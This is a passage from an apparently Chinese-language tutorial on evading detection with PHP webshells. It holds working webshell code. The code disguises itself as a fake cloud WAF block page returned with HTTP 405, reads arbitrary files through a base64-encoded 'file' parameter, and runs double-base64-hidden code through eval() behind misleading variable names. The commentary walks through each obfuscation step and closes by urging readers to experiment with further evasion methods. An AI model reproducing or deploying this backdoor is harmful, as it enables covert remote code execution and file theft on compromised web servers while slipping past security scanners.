pZD02ODUzMDgyOTUmYXBsdXMmdWRwaWQ9VldlVU9jZVFKZEtqJiZ5dW5pZD0mZTkzYjRlM2U3NWUwNSZ0cmlkPTY1MjViNzk2MTU4MzkyMDYwOTQwMDM5MzhlJmFzaWQ9QVlmNTJDamh0V2hlK2FmK0hRQUFBQUNXQS9TSW5PM1FMdz09IiwgaWQgPSAidGItYmVhY29uLWFwbHVzIiwgc3JjID0gKGxvY2F0aW9uID4gImh0dHBzIiA/ICIvL2ciIDogIi8vZyIpICsgIi5hbGljZG4uY29tL2FsaWxvZy9tbG9nL2FwbHVzX3YyLmpzIikKICAgIDwvc2NyaXB0PgogICAgPHNjcmlwdD4KICAgICAgICAvLwogICAgICAgIHZhciBpMThuT2JqZWN0ID0gewogICAgICAgICAgICAiemgtY24iOiB7CiAgICAgICAgICAgICAgICAibWVzc2FnZSI6ICLlvojmirHmrYnvvIznlLHkuo7mgqjorr/pl67nmoRVUkzmnInlj6/og73lr7nnvZHnq5npgKDmiJDlronlhajlqIHog4HvvIzmgqjnmoTorr/pl67ooqvpmLvmlq3jgIIiLAogICAgICAgICAgICAgICAgImJnSW1nIjogImh0dHBzOi8vZXJyb3JzLmFsaXl1bi5jb20vaW1hZ2VzL1RCMTVRR2FIcFhYWFhYT2FYWFhYaWEzOVhYWC02NjAtMTE3LnBuZyIsCiAgICAgICAgICAgICAgICAicmVwb3J0IjogIuivr+aKpeWPjemmiCIsCiAgICAgICAgICAgIH0sCiAgICAgICAgICAgICJlbi11cyI6IHsKICAgICAgICAgICAgICAgICJtZXNzYWdlIjogIlNvcnJ5LCB3ZSBoYXZlIGRldGVjdGVkIG1hbGljaW91cyB0cmFmZmljIGZyb20geW91ciBuZXR3b3JrLCBwbGVhc2UgdHJ5IGFnYWluIGxhdGVyLiIsCiAgICAgICAgICAgICAgICAiYmdJbWciOiAiaHR0cHM6Ly9pbWcuYWxpY2RuLmNvbS90ZnMvVEIxQURBT0lGenFLMVJqU1pTZ1hYY3BBVlhhLTEzMjAtMjM0LmpwZyIsCiAgICAgICAgICAgICAgICAicmVwb3J0IjogIlJlcG9ydCIsCiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgdmFyIGkxOG4gPSBpMThuT2JqZWN0WyJlbi11cyJdOwogICAgICAgIGlmIChuYXZpZ2F0b3IubGFuZ3VhZ2UuaW5kZXhPZigiemgiKSA+PSAwKSB7CiAgICAgICAgICAgIGkxOG4gPSBpMThuT2JqZWN0WyJ6aC1jbiJdOwogICAgICAgIH0KCiAgICA8L3NjcmlwdD4KCiAgICA8ZGl2IGRhdGEtc3BtPSIxOTk4NDEwNTM4Ij4KICAgICAgICA8ZGl2IGNsYXNzPSJoZWFkZXIiPgogICAgICAgICAgICA8ZGl2IGNsYXNzPSJjb250YWluZXIiPgogICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0ibWVzc2FnZSI+CiAgICAgICAgICAgICAgICAgICAgPHNjcmlwdD5kb2N1bWVudC53cml0ZShpMThuLm1lc3NhZ2UpPC9zY3JpcHQ+CiAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgPC9kaXY+CiAgICAgICAgPC9kaXY+CiAgICAgICAgPGRpdiBjbGFzcz0ibWFpbiI+CiAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbnRhaW5lciI+CiAgICAgICAgICAgICAgICA8c2NyaXB0PmRvY3VtZW50LndyaXRlKCc8aW1nIHdpZHRoPSI2NjAiIGhlaWdodD0iMTE3IiBzcmM9IicgKyBpMThuLmJnSW1nICsgJyIvPicpPC9zY3JpcHQ+CgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L2Rpdj4KICAgICAgICA8ZGl2IGNsYXNzPSJmb290ZXIiPgogICAgICAgICAgICA8ZGl2IGNsYXNzPSJjb250YWluZXIiPgogICAgICAgICAgICAgICAgPHNwYW4gc3R5bGU9J2Rpc3BsYXk6bm9uZSc+CiAgICAgICAgICAgICAgICAgICAgPHNjcmlwdD4KICAgICAgICAgICAgICAgICAgICAgICAgZnVuY3Rpb24gZ2V0UXVlcnlTdHJpbmcodXJsLCBuYW1lKSB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICB2YXIgcmVnID0gbmV3IFJlZ0V4cCgnKF58JiknICsgbmFtZSArICc9KFteJl0qKSgmfCQpJyk7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICB2YXIgciA9IHVybC5zdWJzdHIoMSkubWF0Y2gocmVnKTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmIChyICE9PSBudWxsKSByZXR1cm4gdW5lc2NhcGUoclsyXSk7IHJldHVybiBudWxsOwogICAgICAgICAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICAgICAgICAgIHZhciBfX3V1aWRfX18gPSBnZXRRdWVyeVN0cmluZyhsb2NhdGlvbi5ocmVmLCAidXVpZCIpCiAgICAgICAgICAgICAgICAgICAgPC9zY3JpcHQ+CiAgICAgICAgICAgICAgICA8L3NwYW4+CiAgICAgICAgICAgICAgICA8YSB0YXJnZXQ9Il9ibGFuayIgaWQ9InJlcG9ydCIgaHJlZj0iamF2YXNjcmlwdDo7IiBkYXRhLXNwbS1jbGljaz0iZ29zdHI9L3dhZi4xMjMuMTIzO2xvY2FpZD1kMDAxOyI+CiAgICAgICAgICAgICAgICAgICAgPHNjcmlwdD5kb2N1bWVudC53cml0ZShpMThuLnJlcG9ydCk8L3NjcmlwdD4KICAgICAgICAgICAgICAgIDwvYT4KICAgICAgICAgICAgPC9kaXY+CiAgICAgICAgPC9kaXY+CiAgICA8L2Rpdj4KICAgIDxkaXYgaWQ9ImFsZXJ0U2hhZG93IiBjbGFzcz0iYWxlcnQtc2hhZG93Ij4KICAgIDwvZGl2PgogICAgPGRpdiBpZD0iYWxlcnRDb250YWluZXIiIGNsYXNzPSJhbGVydCI+CiAgICAgICAgPGgyPgogICAgICAgICAgICDmj5DnpLrvvJoKICAgICAgICAgICAgPGEgaHJlZj0iamF2YXNjcmlwdDo7IiB0aXRsZT0i5YWz6ZetIiBpZD0iY2xvc2VBbGVydCI+CiAgICAgICAgICAgICAgICBYCiAgICAgICAgICAgIDwvYT4KICAgICAgICA8L2gyPgogICAgICAgIDxwPgogICAgICAgICAgICDmhJ/osKLmgqjnmoTlj43ppojvvIzlupTnlKjpmLLngavlopnkvJrlsL3lv6vov5vooYzliIbmnpDlkoznoa7orqTjgIIKICAgICAgICA8L3A+CiAgICA8L2Rpdj4KICAgIDxkaXYgaWQ9ImZlZWRiYWNrLWNvbnRhaW5lciI+CiAgICAgICAgPGRpdiBpZD0icXJjb2RlIj48L2Rpdj4KICAgICAgICA8ZGl2IGlkPSJmZWVkYmFjayI+PC9kaXY+CiAgICA8L2Rpdj4KICAgIDxzY3JpcHQ+CiAgICAgICAgZnVuY3Rpb24gc2hvdygpIHsKICAgICAgICAgICAgdmFyIGcgPSBmdW5jdGlvbiAoZWxlKSB7CiAgICAgICAgICAgICAgICByZXR1cm4gZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoZWxlKTsKICAgICAgICAgICAgfTsKICAgICAgICAgICAgdmFyIHJlcG9ydEhhbmRsZSA9IGcoJ3JlcG9ydCcpOwogICAgICAgICAgICB2YXIgYWxlcnRTaGFkb3cgPSBnKCdhbGVydFNoYWRvdycpOwogICAgICAgICAgICB2YXIgYWxlcnRDb250YWluZXIgPSBnKCdhbGVydENvbnRhaW5lcicpOwogICAgICAgICAgICB2YXIgY2xvc2VBbGVydCA9IGcoJ2Nsb3NlQWxlcnQnKTsKICAgICAgICAgICAgdmFyIG93biA9IHt9OwogICAgICAgICAgICBvd24ucmVwb3J0ID0gZnVuY3Rpb24gKCkgeyAKICAgICAgICAgICAgICAgIG93bi5hbGVydCgpOwogICAgICAgICAgICB9OyBvd24uYWxlcnQgPSBmdW5jdGlvbiAoKSB7IGFsZXJ0U2hhZG93LnN0eWxlLmRpc3BsYXkgPSAnYmxvY2snOyBhbGVydENvbnRhaW5lci5zdHlsZS5kaXNwbGF5ID0gJ2Jsb2NrJzsgfTsgb3duLmNsb3NlID0gZnVuY3Rpb24gKCkgeyBhbGVydFNoYWRvdy5zdHlsZS5kaXNwbGF5ID0gJ25vbmUnOyBhbGVydENvbnRhaW5lci5zdHlsZS5kaXNwbGF5ID0gJ25vbmUnOyB9OwogICAgICAgIH07CgogICAgICAgIHZhciB1dWlkID0gbG9jYXRpb24uaHJlZi5tYXRjaCgvdXVpZD0oW14mXSspLyk7CiAgICAgICAgdXVpZCA9IHV1aWQgJiYgZW5jb2RlVVJJQ29tcG9uZW50KHV1aWRbMV0pOwogICAgICAgIHZhciB1cmxRckNvZGUgPSBsb2NhdGlvbi5ocmVmLm1hdGNoKC9xcmNvZGU9KFteJl0rKS8pOwogICAgICAgIHVybFFyQ29kZSA9IHVybFFyQ29kZSAmJiBkZWNvZGVVUklDb21wb25lbnQodXJsUXJDb2RlWzFdKTsKICAgICAgICBpZiAodXVpZCB8fCB1cmxRckNvZGUpIHsKICAgICAgICAgICAgdmFyIHFyY29kZSA9IG5ldyBRUkNvZGUoZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoInFyY29kZSIpLCB7CiAgICAgICAgICAgICAgICB0ZXh0OiB1cmxRckNvZGUgfHwgdXVpZCwKICAgICAgICAgICAgICAgIHdpZHRoOiA4MCwKICAgICAgICAgICAgICAgIGhlaWdodDogODAsCiAgICAgICAgICAgICAgICBjb2xvckRhcms6ICIjOTk5IiwKICAgICAgICAgICAgfSk7CiAgICAgICAgICAgIHZhciBmZWVkYmFja0xpbmsgPSBnZXRGZWVkYmFja0xpbmsoKTsKICAgICAgICAgICAgZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoImZlZWRiYWNrIikuaW5uZXJIVE1MID0gZmVlZGJhY2tMaW5rOwogICAgICAgIH0KICAgICAgICBmdW5jdGlvbiBnZXRGZWVkYmFja0xpbmsoKSB7CiAgICAgICAgICAgIHZhciB1cmxPcmlnaW47CiAgICAgICAgICAgIHVybE9yaWdpbiA9IGxvY2F0aW9uLmhyZWYubWF0Y2goL29yaWdpbj0oW14mXSspLyk7CiAgICAgICAgICAgIHVybE9yaWdpbiA9IHVybE9yaWdpbiAmJiBkZWNvZGVVUklDb21wb25lbnQodXJsT3JpZ2luWzFdKS5zcGxpdCgiPyIpWzBdOwogICAgICAgICAgICBpZiAodXJsT3JpZ2luKSB7CiAgICAgICAgICAgICAgICB0cnkgewogICAgICAgICAgICAgICAgICAgIHVybE9yaWdpbiA9IG5ldyBVUkwodXJsT3JpZ2luKTsKICAgICAgICAgICAgICAgICAgICBpZiAodXJsT3JpZ2luLnByb3RvY29sICE9PSAiaHR0cHM6IiAmJiB1cmxPcmlnaW4ucHJvdG9jb2wgIT09ICJodHRwOiIpIHsKICAgICAgICAgICAgICAgICAgICAgICAgdXJsT3JpZ2luID0gbnVsbDsKICAgICAgICAgICAgICAgICAgICB9IGVsc2UgewogICAgICAgICAgICAgICAgICAgICAgICB1cmxPcmlnaW4gPSB1cmxPcmlnaW4uaHJlZjsKICAgICAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICB9IGNhdGNoIChlKSB7CiAgICAgICAgICAgICAgICAgICAgaWYgKHR5cGVvZiB1cmxPcmlnaW4gIT09ICJzdHJpbmciIHx8IHVybE9yaWdpbi5pbmRleE9mKCJodHRwIikgIT09IDApIHsKICAgICAgICAgICAgICAgICAgICAgICAgdXJsT3JpZ2luID0gbnVsbDsKICAgICAgICAgICAgICAgICAgICB9IGVsc2UgewogICAgICAgICAgICAgICAgICAgICAgICB1cmxPcmlnaW4gPSBmaWx0ZXJIdG1sKHVybE9yaWdpbik7CiAgICAgICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgfQogICAgICAgICAgICB9CiAgICAgICAgICAgIHZhciBfbGFuZ3VhZ2UgPSBuYXZpZ2F0b3IuYnJvd3Nlckxhbmd1YWdlIHx8IG5hdmlnYXRvci5sYW5ndWFnZTsKICAgICAgICAgICAgdmFyIHRleHQgPSBbInpoLUNOIiwgInpoLWNuIl0uaW5jbHVkZXMoX2xhbmd1YWdlKSA/ICLngrnmiJHlj43ppoggPiIgOiAiQ2xpY2sgdG8gZmVlZGJhY2sgPiI7CiAgICAgICAgICAgIHJldHVybiAnPGEgaHJlZj0iJyArIHVybE9yaWdpbiArICcvX19fX190bWRfX19fXy9wYWdlL2ZlZWRiYWNrP3JhbmQ9UzNXeEdIQWdBdDc1NkVwem53Zk56SnEyQUZBMnFCTmxhM2o2RUlOVVM4V2U5ZGF6TV9pS0VscDhEd1ZTSFpVZXZwQzQxQng3UnppdlhJajlSblpnZGcmdXVpZD0nICsgZW5jb2RlVVJJQ29tcG9uZW50KHV1aWQpICsgJyZ0eXBlPTYiIHRhcmdldD0iX2JsYW5rIj4nICsgdGV4dCArICc8L2E+JzsKICAgICAgICB9OwogICAgICAgIGZ1bmN0aW9uIGZpbHRlckh0bWwoc3RyKSB7CiAgICAgICAgICAgIHN0ciA9IHN0ci5yZXBsYWNlKC8mL2csICIiKTsKICAgICAgICAgICAgc3RyID0gc3RyLnJlcGxhY2UoLz4vZywgIiIpOwogICAgICAgICAgICBzdHIgPSBzdHIucmVwbGFjZSgvPC9nLCAiIik7CiAgICAgICAgICAgIHN0ciA9IHN0ci5yZXBsYWNlKC8iL2csICIiKTsKICAgICAgICAgICAgc3RyID0gc3RyLnJlcGxhY2UoLycvZywgIiIpOwogICAgICAgICAgICBzdHIgPSBzdHIucmVwbGFjZSgvYC9nLCAiIik7CiAgICAgICAgICAgIHN0ciA9IHN0ci5yZXBsYWNlKC9qYXZhc2NyaXB0L2csICIiKTsKICAgICAgICAgICAgc3RyID0gc3RyLnJlcGxhY2UoL2lmcmFtZS9nLCAiIik7CiAgICAgICAgICAgIHJldHVybiBzdHI7CiAgICAgICAgfQoKICAgIDwvc2NyaXB0PgogICAgPHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIGNoYXJzZXQ9InV0Zi04IiBzcmM9Imh0dHBzOi8vZXJyb3JzLmFsaXl1bi5jb20vZXJyb3IuanM/cz0xMCI+CiAgICA8L3NjcmlwdD4KPC9ib2R5PgoKPC9odG1sPg==";
if( count($_REQUEST) || file_get_contents("php://input") ){
}else{
header('Content-Type:text/html;charset=utf-8'); http_response_code(405);
echo base64_decode($VEIUrP);
}
|
将文件内容通过base64后传入header的serve参数,设置一个file参数值,传入
QzpccGhwU3R1ZHlcUEhQVHV0b3JpYWxcV1dXXDEyMy5waHA=
这里就会将base64解码得到C:\phpStudy\PHPTutorial\WWW\123.php,实际上没用,是一个扰乱视线的代码
1
2
3
4
5
6
7
8
9
10
11
| header('Serve:'.base64_encode(__FILE__));
$password='WlhaaGvTLtwRENJvTLtwRENDZ2tYMvTLtwRENUJQVTFSYkoyTnRaQ2RkS1RzPQ==';
ob_start();
if($_GET['file']){
$a = base64_decode($_GET['file']);
}else{
$a = 'application.xml';
}
readfile($a);
$file = ob_get_contents();
ob_end_clean();
|
传入之后系统会读取base64解码之后的整个文件内容,因为这个内容在之前serve插入了,所以第一行是
1
2
3
4
5
6
7
8
9
10
11
| $username = substr($file,8,8);
$template_source = str_replace($username,'',$password);
$template_source = base64_decode($template_source);
$template_source = base64_decode($template_source);
$key = 'template_source';
if(@$_GET['file']){
$aes_decode[1]=$$key;
}else{
$aes_decode[1]='echo \'\';';
}
@eval($aes_decode[1]);
|
这里截取字符串实际上也会把注释内容截取,截取之后剩下
vTLtwREN,也就作为了username,并且去替换password
通过两次base64解码和迷惑性的自定义变量实现命令执行
0x03总结
有攻就有防,免杀手段是永远更新不完的,上文只是列举了某几个免杀的方法,更多的可以自行探索,这个领域更多还是靠奇思妙想和大胆实操,一个一个去试才能知道哪个方法会更适合自己。
